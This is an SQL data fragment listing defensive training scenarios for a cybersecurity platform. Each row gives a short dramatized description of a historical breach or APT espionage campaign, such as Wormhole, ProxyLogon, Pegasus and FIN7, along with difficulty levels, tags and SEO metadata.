(95, 'Operation Wormhole Bridge', 'Unknown', 'Investigate the $325 million theft via a signature verification flaw in Wormhole\'s smart contract and the unusual $10M bug bounty offer.', 'In the early hours of a cold Tuesday morning, chaos erupted in the blockchain community as reports emerged of a massive $325 million theft from the Wormhole bridge. The cyber heist, executed by an unidentified APT group, exploited a critical vulnerability in the smart contract’s signature verification process. Surprisingly, a $10 million bug bounty was offered to the attacker. Your mission: dissect the smart contract exploitation and unravel the mystery behind the bounty offer, tracing the steps of this audacious cyber operation.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"cybersecurity training\\\",\\\"smart contract exploitation\\\",\\\"blockchain security\\\",\\\"APT investigation\\\",\\\"signature verification\\\"]\"', '', 4, '2026-01-17 03:44:35', 'Wormhole Bridge Heist: Analyzing Smart Contract Exploitation', 'Investigate the $325 million theft via a signature verification flaw in Wormhole\'s smart contract and the unusual $10M bug bounty offer.', 'operation-wormhole-bridge', 1),
(96, 'Operation Poly Network', 'Unknown (White Hat?)', 'Analyze a $610 million DeFi hack with an unknown attacker who returned the funds, highlighting cross-chain vulnerabilities.', 'In a baffling twist of finance and ethics, a mysterious attacker siphoned off $610 million from a leading DeFi platform, only to return the funds days later. This advanced training scenario dives into the complexities of cross-chain vulnerabilities, exploring the enigmatic dialogue between the hacker and the victim platform. Trainees will step into the shoes of cybersecurity investigators tasked with dissecting this unprecedented event.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"DeFi hack\\\",\\\"cross-chain vulnerability\\\",\\\"cybersecurity training\\\",\\\"crypto investigation\\\",\\\"ethical hacking\\\"]\"', '', 6, '2026-01-17 03:46:27', 'The $610 Million DeFi Mystery: Unraveling the Cross-Chain Exploit', 'Analyze a $610 million DeFi hack with an unknown attacker who returned the funds, highlighting cross-chain vulnerabilities.', 'operation-poly-network', 1),
(97, 'T-Mobile Breach', 'John Binns (Individual)', 'Investigate the T-Mobile breach by John Binns exposing 54M records via router exploitation.', 'In 2021, a lone threat actor known as John Binns breached T-Mobile\'s defenses, exposing the data of 54 million customers. This training scenario challenges participants to dissect the breach, unravel the attacker\'s methods, and understand the intricate dance between exploitation and data exfiltration. Participants will navigate through public taunts and data sales in the shadowy corners of the internet.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"T-Mobile breach\\\",\\\"cybersecurity training\\\",\\\"John Binns\\\",\\\"data exfiltration\\\",\\\"APT investigation\\\"]\"', '', 5, '2026-01-17 03:47:33', 'John Binns\' T-Mobile Breach Investigation Training', 'Investigate the T-Mobile breach by John Binns exposing 54M records via router exploitation.', 't-mobile-breach', 1);
INSERT INTO `operations` (`id`, `title`, `apt_group`, `description`, `story_intro`, `difficulty_level`, `display_order`, `is_active`, `is_premium`, `passing_grade`, `time_limit_hours`, `tags`, `scenario_prompt`, `total_alerts`, `created_at`, `seo_title`, `seo_description`, `slug`, `min_level`) VALUES
(98, 'Operation Yahoo Breach', 'FSB Officers / Criminal Hackers', 'Analyze the techniques behind the Yahoo breach affecting 3 billion accounts, focusing on forged cookies and state-sponsored threats.', 'In 2013, Yahoo experienced a massive data breach, compromising 3 billion accounts. This operation delves into the sophisticated tactics used by FSB officers and criminal hackers. Participants will investigate the creation of forged cookies that bypass passwords and the strategic targeting of journalists, unraveling the layers of one of history\'s largest cyber-attacks.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Yahoo breach\\\",\\\"forged cookies\\\",\\\"state-sponsored hacking\\\",\\\"FSB\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-01-17 03:49:21', 'Unraveling the Yahoo Data Breach: A Deep Dive', 'Analyze the techniques behind the Yahoo breach affecting 3 billion accounts, focusing on forged cookies and state-sponsored threats.', 'operation-yahoo-breach', 1),
(99, 'Operation LinkedIn Scrape', 'Data Brokers', 'Learn to analyze API abuse in a scenario where 700 million LinkedIn profiles were scraped by the Data Brokers APT group.', 'In this training scenario, participants will dive into the world of cyber threats targeting social media platforms. The Data Brokers, a notorious APT group, have executed a massive scraping operation, collecting 700 million LinkedIn profiles. Trainees will explore API abuse, differentiate between data scraping and breaches, and understand the risks associated with aggregating public data.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"API abuse\\\",\\\"Data scraping\\\",\\\"LinkedIn breach\\\",\\\"Data aggregation\\\",\\\"Cybersecurity training\\\"]\"', '', 5, '2026-01-17 03:49:46', 'Investigating LinkedIn Profile Scraping by Data Brokers', 'Learn to analyze API abuse in a scenario where 700 million LinkedIn profiles were scraped by the Data Brokers APT group.', 'operation-linkedin-scrape', 1),
(104, 'Operation GoDaddy Breach', 'Unknown (Social Engineering)', 'Explore the GoDaddy breach affecting 1.2M users via social engineering tactics and credential theft.', 'In a sprawling cyber operation, an unknown APT group has targeted GoDaddy\'s WordPress customers over several years. This training scenario delves into the tactics used, including social engineering, credential compromises, and sensitive data theft. Participants will uncover how attackers gained access, maintained their presence, and exfiltrated critical information.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"GoDaddy breach\\\",\\\"WordPress security\\\",\\\"cybersecurity training\\\",\\\"credential theft\\\",\\\"social engineering\\\"]\"', '', 5, '2026-01-24 00:36:52', 'Beginner Cybersecurity Training: GoDaddy WordPress Breach Investigation', 'Explore the GoDaddy breach affecting 1.2M users via social engineering tactics and credential theft.', 'operation-godaddy-breach', 1),
(102, 'Operation Facebook Leak', 'Unknown', 'Analyze the breach of 533 million Facebook users\' data via a long-exploited vulnerability.', 'In early 2021, security researchers uncovered a massive leak involving the personal data of 533 million Facebook users. The data, exposed through a vulnerability in Facebook\'s contact importer feature, had been accessible for years before it was publicly disclosed. In this advanced training scenario, you will investigate the exploitation of this vulnerability, piece together the timeline of events, and analyze the threat actor\'s techniques, tactics, and procedures.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Facebook data breach\\\",\\\"cybersecurity training\\\",\\\"contact importer vulnerability\\\",\\\"APT investigation\\\"]\"', '', 5, '2026-01-24 00:09:12', 'Investigating the Facebook Data Breach: Unveiling the Contact Importer Vulnerability', 'Analyze the breach of 533 million Facebook users\' data via a long-exploited vulnerability.', 'operation-facebook-leak', 1),
(103, 'Operation Twitch Leak', 'Anonymous (4chan)', 'Expert-level analysis of the Twitch leak by Anonymous (4chan), exploring server misconfiguration and competitive risks.', 'In a shocking cyber event, the complete Twitch source code, including sensitive streamer earnings data, has been leaked by Anonymous (4chan). This 125GB data dump, attributed to a misconfigured server exposure, poses severe competitive intelligence risks. As a senior analyst, your mission is to meticulously investigate this breach, identify the weak points, and provide insights into mitigating future threats.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Twitch leak\\\",\\\"Anonymous 4chan\\\",\\\"cybersecurity training\\\",\\\"APT investigation\\\",\\\"competitive intelligence\\\"]\"', '', 5, '2026-01-24 00:32:33', 'Advanced Investigation of Twitch Source Code and Earnings Breach', 'Expert-level analysis of the Twitch leak by Anonymous (4chan), exploring server misconfiguration and competitive risks.', 'operation-twitch-leak', 1),
(105, 'Operation Microsoft Email Servers', 'Hafnium (ProxyLogon)', 'Investigate Hafnium\'s mass exploitation of Exchange servers using ProxyLogon vulnerabilities.', 'In early 2021, the world faced a massive cyber onslaught as Hafnium, a sophisticated APT group, exploited a series of zero-day vulnerabilities in Microsoft Exchange servers. With over 250,000 instances affected globally, organizations scrambled to patch their systems before the access was weaponized by ransomware operators. Trainees will dive into the intricate attack chain, from initial access to potential data exfiltration, and develop skills to counter such threats.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Hafnium\\\",\\\"ProxyLogon\\\",\\\"Exchange Server\\\",\\\"Cybersecurity Training\\\",\\\"Zero-day Vulnerabilities\\\"]\"', '', 3, '2026-01-24 03:31:55', 'Hafnium ProxyLogon Exploit Response Training', 'Investigate Hafnium\'s mass exploitation of Exchange servers using ProxyLogon vulnerabilities.', 'operation-microsoft-email-servers', 1),
(106, 'Operation Pegasus', 'NSO Group (Commercial Spyware)', 'Learn how to detect Pegasus spyware using zero-click iMessage exploits targeting journalists and more.', 'In this training scenario, you will dive into a complex investigation involving the notorious Pegasus spyware. Developed by the NSO Group, this commercial spyware has been used to target journalists, activists, and even heads of state. Your mission is to follow the trail of zero-click iMessage exploits, understand the FORCEDENTRY vulnerability, and identify forensic indicators on infected iOS devices. As a beginner, you\'ll explore each step of the attack chain, gaining valuable skills in identifying and mitigating these sophisticated threats.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Pegasus Spyware\\\",\\\"NSO Group\\\",\\\"iMessage Exploit\\\",\\\"FORCEDENTRY\\\",\\\"Cybersecurity Training\\\"]\"', '', 4, '2026-01-24 03:32:31', 'Beginner\'s Guide to Identifying Pegasus Spyware Activites', 'Learn how to detect Pegasus spyware using zero-click iMessage exploits targeting journalists and more.', 'operation-pegasus', 1),
(107, 'Operation APT1 Mandiant', 'APT1 (PLA Unit 61398)', 'Investigate APT1\'s cyber espionage tactics, analyzing their Shanghai-based operations and theft from over 141 organizations.', 'In a groundbreaking investigation, cybersecurity experts have traced a series of sophisticated cyber espionage activities back to APT1, a notorious Chinese military hacking group. Known for their relentless targeting of intellectual property across diverse industries, this operation unveils the intricate tactics of the \'Comment Crew\' and their Shanghai-based digital infrastructure. Trainees must navigate through the cyber labyrinth to understand and counteract the threat posed by these skilled adversaries.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"APT1\\\",\\\"cyber espionage\\\",\\\"Comment Crew\\\",\\\"intellectual property theft\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-01-24 03:34:20', 'Operation Comment Crew: Unmasking APT1\'s Cyber Espionage', 'Investigate APT1\'s cyber espionage tactics, analyzing their Shanghai-based operations and theft from over 141 organizations.', 'operation-apt1-mandiant', 1),
(108, 'Operation Regin', 'Five Eyes (GCHQ/NSA)', 'Uncover the intricate layers of a sophisticated modular malware used by Five Eyes APT for intelligence gathering.', 'In the heart of an international cyber espionage campaign, operatives from Five Eyes have deployed a modular malware platform targeting GSM base stations. This operation calls for a deep investigation into its encrypted virtual file system and multi-stage loading architecture. Analysts must unravel the complexity of this threat to protect critical communications infrastructure.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Five Eyes APT\\\",\\\"modular malware\\\",\\\"GSM targeting\\\",\\\"cyber espionage\\\",\\\"threat analysis\\\"]\"', '', 5, '2026-01-24 03:34:45', 'Five Eyes Modular Malware Investigation', 'Uncover the intricate layers of a sophisticated modular malware used by Five Eyes APT for intelligence gathering.', 'operation-regin', 1),
(109, 'Operation Duqu', 'Equation Group (Tilded Platform)', 'Analyze Stuxnet-related malware targeting ICS vendors, focusing on code lineage and intelligence gathering.', 'In this advanced training scenario, participants will delve into the intricate world of cyber espionage orchestrated by the notorious Equation Group. The mission involves dissecting a sophisticated reconnaissance malware linked to Stuxnet, targeting industrial control system vendors. As the team investigates, they will uncover shared code lineage, strategic intelligence gathering, and potential preparation for future attacks. The operation challenges participants to think like advanced threat actors and build a robust defense strategy.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Equation Group\\\",\\\"Stuxnet\\\",\\\"Industrial Control Systems\\\",\\\"Cyber Espionage\\\",\\\"Advanced Threats\\\"]\"', '', 5, '2026-01-24 03:35:12', 'Advanced Reconnaissance with Equation Group Tactics', 'Analyze Stuxnet-related malware targeting ICS vendors, focusing on code lineage and intelligence gathering.', 'operation-duqu', 1),
(110, 'Operation Careto', 'The Mask (Spanish-speaking APT)', 'Investigate The Mask\'s espionage targeting governments with Careto malware intercepting communications.', 'In a world where information is power, The Mask, a Spanish-speaking APT group, has launched a sophisticated espionage campaign. Their custom malware, Careto, is designed to intercept and manipulate communication channels within government institutions, diplomatic entities, and energy companies. As a senior analyst, you are tasked with uncovering their tactics, techniques, and procedures to protect critical infrastructures.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"The Mask APT\\\",\\\"Careto malware\\\",\\\"cyber espionage\\\",\\\"government security\\\",\\\"APT attack\\\"]\"', '', 5, '2026-01-24 03:39:29', 'Expert Espionage Analysis: Uncover The Mask\'s Careto Campaign', 'Investigate The Mask\'s espionage targeting governments with Careto malware intercepting communications.', 'operation-careto', 1),
(111, 'Operation Machete', 'Machete (Latin American APT)', 'Investigate Machete\'s espionage campaign targeting military and government in Venezuela, Ecuador, Colombia.', 'In recent months, the Machete APT group has been orchestrating a sophisticated espionage campaign targeted at military and government entities across Venezuela, Ecuador, and Colombia. Leveraging social engineering techniques, they deploy custom Python-based Remote Access Trojans (RATs) to infiltrate sensitive networks. Your task is to analyze their tactics and understand how these attacks unfold, from initial access to data exfiltration.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Machete APT\\\",\\\"Espionage\\\",\\\"Cybersecurity Training\\\",\\\"Latin America\\\",\\\"Python RATs\\\"]\"', '', 5, '2026-01-24 03:39:54', 'Operation Machete: Espionage in Latin America', 'Investigate Machete\'s espionage campaign targeting military and government in Venezuela, Ecuador, Colombia.', 'operation-machete', 1),
(112, 'Operation Poseidon', 'Poseidon Group', 'Explore Poseidon Group\'s tactics in extortion-driven attacks on banks, focusing on data leaks.', 'Welcome to the Poseidon Group threat simulation. In this scenario, you\'ll dive into the shadowy operations of a Brazilian-Portuguese speaking cybermercenary group targeting financial institutions. As a novice analyst, you will unravel their tactics, techniques, and procedures, tracing their path from initial breach to the brink of data extortion. Your mission is to thwart their plans and safeguard sensitive financial data.', 'novice', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"Poseidon Group\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"financial institutions\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"data extortion\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 3, '2026-01-25 19:59:15', 'Poseidon Group Threat Simulation: Financial Institution Breach', 'Explore Poseidon Group\'s tactics in extortion-driven attacks on banks, focusing on data leaks.', 'operation-poseidon', 1),
(113, 'Operation Carbanak 2.0', 'FIN7 (Carbanak)', 'Uncover FIN7\'s shift from bank theft to point-of-sale system attacks using legitimate tools.', 'In the evolving landscape of cyber threats, the notorious APT group FIN7, also known as Carbanak, has adapted its tactics. Previously infamous for direct bank heists, FIN7 is now targeting point-of-sale (POS) systems across retail sectors. Leveraging legitimate penetration testing tools for illicit purposes, this operation requires analysts to trace the evolution of the malware and adapt their defensive strategies. Participants will investigate a series of alerts that reveal FIN7\'s cunning shift in tactics.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"FIN7\\\",\\\"Carbanak\\\",\\\"bank malware\\\",\\\"point-of-sale\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-01-28 00:03:11', 'FIN7\'s New Threat: From Banks to Point-of-Sale Systems', 'Uncover FIN7\'s shift from bank theft to point-of-sale system attacks using legitimate tools.', 'operation-carbanak-2-0', 1),
(114, 'Operation Silence', 'Silence Group', 'Investigate and neutralize Silence Group\'s ATM malware targeting Eastern European banks.', 'In the heart of Eastern Europe, a notorious Russian-speaking APT group, known as Silence Group, has been meticulously planning its next strike against financial institutions. Their objective: to compromise bank networks and gain control over ATMs. Your mission is to unravel their tactics, techniques, and procedures, focusing on their sophisticated reconnaissance and malware deployment phases.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Silence Group\\\",\\\"ATM malware\\\",\\\"Eastern Europe banks\\\",\\\"cybersecurity training\\\",\\\"APT threats\\\"]\"', '', 5, '2026-01-28 00:06:40', 'Advanced Threat Detection: Silence Group\'s ATM Malware Attack', 'Investigate and neutralize Silence Group\'s ATM malware targeting Eastern European banks.', 'operation-silence', 1),
(115, 'Operation Cobalt Gypsy', 'APT35 (Cobalt Gypsy)', 'Investigate APT35\'s cybersecurity operations targeting aerospace and telecom with Magic Hound malware.', 'In a climate of escalating international tensions, your cybersecurity team is tasked to investigate a sophisticated Iranian cyber-espionage campaign led by the notorious APT35 group, also known as Cobalt Gypsy. The operation focuses on their use of the \'Magic Hound\' malware, leveraging legitimate cloud services for command and control to infiltrate and extract sensitive data from aerospace and telecommunications sectors. Engage in this high-stakes scenario where expert skills are needed to unravel their methods and thwart their objectives.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"APT35\\\",\\\"Magic Hound\\\",\\\"cyber-espionage\\\",\\\"aerospace security\\\",\\\"telecommunications threat\\\"]\"', '', 5, '2026-01-28 00:07:19', 'Advanced Iranian Cyber-Espionage Simulation: APT35\'s Magic Hound Tactics', 'Investigate APT35\'s cybersecurity operations targeting aerospace and telecom with Magic Hound malware.', 'operation-cobalt-gypsy', 1),
(116, 'Operation Leafminer', 'Leafminer (Iranian APT)', 'Investigate Leafminer\'s espionage activities in the Middle East using Dropbox C2 and Total Commander RAT.', 'In the ever-evolving landscape of cyber threats, the Leafminer APT group has emerged as a formidable adversary. This Iranian group has launched a sophisticated espionage campaign targeting government and business entities across the Middle East. Leveraging Dropbox-based command and control (C2) infrastructure and exploiting the Total Commander remote access tool, Leafminer aims to infiltrate, persist, and exfiltrate sensitive information. Your mission is to unravel their tactics and mitigate the threat.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Leafminer APT\\\",\\\"Dropbox C2\\\",\\\"Total Commander RAT\\\",\\\"Middle East Espionage\\\",\\\"Cybersecurity Training\\\"]\"', '', 5, '2026-02-01 13:56:00', 'Leafminer Espionage Investigation: Dropbox C2 and Remote Access Exploitation', 'Investigate Leafminer\'s espionage activities in the Middle East using Dropbox C2 and Total Commander RAT.', 'operation-leafminer', 1),
(117, 'Operation Thamar Reservoir', 'APT35 (Charming Kitten)', 'Investigate APT35\'s targeted campaign against Israeli academics using fake conference lures for credential harvesting.', 'In this training scenario, you will step into the shoes of a cybersecurity analyst tasked with investigating a sophisticated spear-phishing campaign orchestrated by APT35, also known as Charming Kitten. This Iranian-linked group has launched a deceptive operation targeting Israeli academics and defense officials. Utilizing fake conference invitations, they aim to harvest credentials and infiltrate sensitive networks. Your mission is to unravel the layers of this operation and protect critical assets from being compromised.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"APT35\\\",\\\"Charming Kitten\\\",\\\"Credential Harvesting\\\",\\\"Cyber Threat Intelligence\\\",\\\"Cybersecurity Training\\\"]\"', '', 4, '2026-02-01 13:56:29', 'Charming Kitten\'s Deceptive Invitations: A Cyber Threat Analysis', 'Investigate APT35\'s targeted campaign against Israeli academics using fake conference lures for credential harvesting.', 'operation-thamar-reservoir', 1),
(118, 'Operation Spy Banker', 'RTM Group', 'Investigate RTM Group\'s banking trojan and its impact on Russian financial institutions.', 'In the bustling financial district of Moscow, a silent menace lurks in the shadows. The RTM Group, a notorious cybercrime syndicate, has launched a new wave of attacks targeting Russian banks. Their weapon of choice: a sophisticated banking trojan that disguises itself within legitimate software, silently monitoring the activities of unsuspecting accountants. As a novice cyber intelligence analyst, you are tasked with unraveling this cyber conundrum, tracing the trojan\'s path, and thwarting the RTM Group\'s malicious objectives.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"RTM Group\\\",\\\"banking trojan\\\",\\\"Russian financial institutions\\\",\\\"cybersecurity training\\\",\\\"cyber threat intelligence\\\"]\"', '', 3, '2026-02-01 13:56:59', 'RTM Group Trojan Analysis in Russian Banking', 'Investigate RTM Group\'s banking trojan and its impact on Russian financial institutions.', 'operation-spy-banker', 1),
(119, 'Operation TA505', 'TA505', 'Investigate TA505\'s transition from Dridex to Clop ransomware in this advanced cybersecurity operation.', 'In the high-stakes world of cyber warfare, TA505 stands out as a formidable adversary. Known for its financial motivation, this threat group has evolved its arsenal from distributing Dridex to unleashing the devastating Locky and Clop ransomware. As a senior analyst, your mission is to dissect their tactics, techniques, and procedures (TTPs) through a series of alerts that uncover their sophisticated attack chain. Each alert will challenge your skills in threat detection and incident response, leading you through the complex layers of a multi-stage attack.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"TA505\\\",\\\"cybersecurity operation\\\",\\\"Dridex\\\",\\\"Locky ransomware\\\",\\\"Clop ransomware\\\"]\"', '', 5, '2026-02-01 13:57:39', 'Advanced Threat Hunting: Unraveling TA505\'s Ransomware Evolution', 'Investigate TA505\'s transition from Dridex to Clop ransomware in this advanced cybersecurity operation.', 'operation-ta505', 1),
(120, 'Operation Winnti Evolution', 'Winnti Group', 'Investigate Winnti Group\'s code-signing certificate theft and supply chain attacks against game distributors.', 'In the heart of the gaming industry, a silent predator lurks. The notorious Winnti Group, known for its sophisticated supply chain attacks, has once again set its sights on the gaming sector. This operation delves into how this APT group orchestrates code-signing certificate thefts and manipulates game distribution networks to execute broader attacks. Trainees will navigate through a complex web of espionage and financial motives, tracing the group\'s footprints and countering their every move.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Winnti Group\\\",\\\"Supply Chain Attack\\\",\\\"Gaming Industry Espionage\\\",\\\"Cyber Defense Training\\\",\\\"APT41\\\"]\"', '', 5, '2026-02-01 14:00:16', 'Winnti Group Espionage in the Gaming Sector: A Cyber Defense Simulation', 'Investigate Winnti Group\'s code-signing certificate theft and supply chain attacks against game distributors.', 'operation-winnti-evolution', 1),
(121, 'Operation Tick', 'Tick (Bronze Butler)', 'Analyze Tick APT\'s use of the Daserf backdoor in targeting Japan\'s defense and aerospace sectors.', 'In this training scenario, participants will dive into the operations of the notorious Tick APT group, also known as Bronze Butler. Known for its espionage activities focused on Japan\'s defense, aerospace, and satellite technology sectors, Tick APT employs the Daserf backdoor to infiltrate and exfiltrate sensitive information. As a beginner analyst, you will learn to identify and respond to these sophisticated threats through a series of alerts that simulate a real-world attack.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Tick APT\\\",\\\"Daserf backdoor\\\",\\\"cyber espionage\\\",\\\"Japan defense\\\",\\\"aerospace security\\\"]\"', '', 5, '2026-02-01 14:00:41', 'Tick APT: Uncovering Espionage with Daserf', 'Analyze Tick APT\'s use of the Daserf backdoor in targeting Japan\'s defense and aerospace sectors.', 'operation-tick', 1),
(122, 'Operation Blackgear', 'Blackgear (Topgear)', 'Engage in an advanced cyber operation to dissect Blackgear\'s Taiwan-focused espionage, analyzing blog-based C2 and Protux backdoor.', 'In the high-stakes world of cyber espionage, nations constantly battle unseen adversaries. Taiwan, with its pivotal geopolitical status, has become a prime target for the notorious APT group Blackgear. This operation invites you to step into the shoes of a senior analyst, tasked with dissecting Blackgear\'s intricate espionage campaign. Your mission is to unravel their blog-based C2 infrastructure and the deployment of the Protux backdoor, targeting critical government and telecommunications sectors. Prepare for an immersive experience that challenges your investigative skills and strategic thinking.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Blackgear\\\",\\\"espionage\\\",\\\"Taiwan\\\",\\\"blog-based C2\\\",\\\"Protux backdoor\\\"]\"', '', 5, '2026-02-01 14:01:01', 'Advanced Blackgear Espionage Simulation: Unraveling Taiwan\'s Threat Landscape', 'Engage in an advanced cyber operation to dissect Blackgear\'s Taiwan-focused espionage, analyzing blog-based C2 and Protux backdoor.', 'operation-blackgear', 1),
(123, 'Operation Patchwork', 'Patchwork (Dropping Elephant)', 'Investigate Patchwork\'s code recycling tactics targeting Pakistan\'s military using borrowed malware techniques.', 'In the complex realm of cyber espionage, the South Asian group known as Patchwork, or Dropping Elephant, has made its mark through a unique approach: code recycling. By borrowing code snippets from a variety of malware families, they craft sophisticated attacks aimed at Pakistani military and diplomatic entities. As a cybersecurity defender, your mission is to delve into these recycled code techniques and uncover the group\'s strategies before they succeed in their espionage objectives.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Patchwork APT\\\",\\\"cyber espionage\\\",\\\"code recycling\\\",\\\"South Asian threat\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-02-01 14:01:23', 'Operation Recycled Code: Unmasking Patchwork\'s Espionage Tactics', 'Investigate Patchwork\'s code recycling tactics targeting Pakistan\'s military using borrowed malware techniques.', 'operation-patchwork', 1),
(124, 'Operation Sidewinder', 'Sidewinder (Rattlesnake)', 'Explore Sidewinder APT\'s tactics against military and government sectors in Pakistan and China.', 'In this training scenario, participants will delve into the activities of the Sidewinder APT, also known as Rattlesnake, a group notorious for its aggressive targeting of military and governmental entities in South Asia. Trainees will be tasked with investigating how this threat actor rapidly exploits newly disclosed vulnerabilities to infiltrate systems, aiming to gather intelligence and disrupt operations within Pakistan and China. The scenario will unfold through a series of alerts, simulating the APT\'s attack chain, challenging participants to identify and mitigate these threats effectively.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Sidewinder APT\\\",\\\"cybersecurity training\\\",\\\"South Asia threat\\\",\\\"vulnerability exploitation\\\",\\\"APT investigation\\\"]\"', '', 3, '2026-02-07 21:11:35', 'Sidewinder APT: Investigating Military Targeting in South Asia', 'Explore Sidewinder APT\'s tactics against military and government sectors in Pakistan and China.', 'operation-sidewinder', 1),
(125, 'Operation Transparent Tribe', 'APT36 (Transparent Tribe)', 'Investigate APT36\'s targeting of Indian military with Crimson RAT malware and fake personas.', 'In this training scenario, participants will delve into the tactics of APT36, also known as Transparent Tribe, an advanced persistent threat group with a focus on India. Trainees will explore how this Pakistani group employs the Crimson RAT malware and sophisticated social engineering techniques using fake personas. The mission is to follow the digital breadcrumbs, understand the kill chain, and develop skills to counteract these tactics.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"APT36\\\",\\\"Crimson RAT\\\",\\\"cybersecurity training\\\",\\\"honeytrap\\\",\\\"social engineering\\\"]\"', '', 5, '2026-02-07 21:12:40', 'Beginner Training: Analyzing APT36\'s Crimson RAT and Honeytrap Tactics', 'Investigate APT36\'s targeting of Indian military with Crimson RAT malware and fake personas.', 'operation-transparent-tribe', 1),
(126, 'Operation Donot Team', 'Donot Team (APT-C-35)', 'Investigate Donot Team\'s espionage on South Asian governments using Android malware and multi-platform attacks.', 'The South Asian geopolitical landscape has become the battleground for a sophisticated cyber espionage campaign orchestrated by the notorious Donot Team (APT-C-35). This scenario challenges you to delve into their multi-platform capabilities, focusing on their Android malware strategies against government and military entities. As an advanced cyber threat analyst, your mission is to uncover, analyze, and mitigate the impact of these covert operations.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Donot Team\\\",\\\"espionage campaigns\\\",\\\"Android malware\\\",\\\"multi-platform attacks\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-02-07 21:12:40', 'Advanced Analysis of Donot Team\'s Espionage Campaigns', 'Investigate Donot Team\'s espionage on South Asian governments using Android malware and multi-platform attacks.', 'operation-donot-team', 1),
(127, 'Operation Bitter', 'Bitter (T-APT-17)', 'Investigate Bitter APT\'s exploitation of InPage vulnerabilities and ArtraDownloader malware in South Asia.', 'In this expert-level training scenario, participants will delve into the complex operations of Bitter APT (T-APT-17) targeting South Asian governments. This mission involves analyzing their exploitation of InPage vulnerabilities, specifically targeting Urdu-language users, and the deployment of the ArtraDownloader malware. Trainees will navigate through a series of alerts to uncover Bitter\'s sophisticated attack strategies and defend against their persistent threats.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Bitter APT\\\",\\\"InPage Exploit\\\",\\\"ArtraDownloader\\\",\\\"South Asian Cybersecurity\\\",\\\"APT Training\\\"]\"', '', 5, '2026-02-07 21:13:22', 'Advanced Threat Operation: Unmasking Bitter APT in South Asia', 'Investigate Bitter APT\'s exploitation of InPage vulnerabilities and ArtraDownloader malware in South Asia.', 'operation-bitter', 1),
(128, 'Operation Spring Dragon', 'Lotus Blossom (Spring Dragon)', 'Investigate Lotus Blossom\'s espionage targeting ASEAN military and government sectors using the Elise backdoor.', 'In this intermediate-level training scenario, participants will delve into the sophisticated operations of the Lotus Blossom APT group, notorious for its decade-long espionage campaign against ASEAN countries. Trainees will analyze the deployment of the \'Elise\' backdoor, a tool that has facilitated the group\'s persistent infiltration into government and military networks. As the investigation unfolds, participants will uncover the nuances of this operation, enhancing their threat intelligence and response capabilities.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Lotus Blossom APT\\\",\\\"Elise backdoor\\\",\\\"ASEAN espionage\\\",\\\"cyber threat intelligence\\\",\\\"government cyber attack\\\"]\"', '', 5, '2026-02-07 21:20:05', 'Lotus Blossom Espionage Campaign Training Exercise', 'Investigate Lotus Blossom\'s espionage targeting ASEAN military and government sectors using the Elise backdoor.', 'operation-spring-dragon', 1),
(129, 'Operation Keyboy  ', 'KeyBoy (APT23)', 'Investigate how KeyBoy (APT23) exploits Office vulnerabilities to target media and NGOs in Vietnam.', 'In recent months, the cyber landscape has been rattled by a series of sophisticated attacks targeting media organizations and NGOs in Vietnam. At the heart of these operations is KeyBoy, a notorious APT group known for its precision and stealth. Our mission is to unravel their espionage campaign, focusing on their exploitation of Microsoft Office vulnerabilities. As a beginner analyst, you\'ll decode their tactics and safeguard vital information.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"KeyBoy APT23\\\",\\\"Vietnam Espionage\\\",\\\"Microsoft Office Exploits\\\",\\\"Cybersecurity Training\\\",\\\"Media and NGO Targeting\\\"]\"', '', 5, '2026-02-07 21:20:25', 'KeyBoy APT23: Uncovering Vietnam-focused Espionage', 'Investigate how KeyBoy (APT23) exploits Office vulnerabilities to target media and NGOs in Vietnam.', 'operation-keyboy', 1),
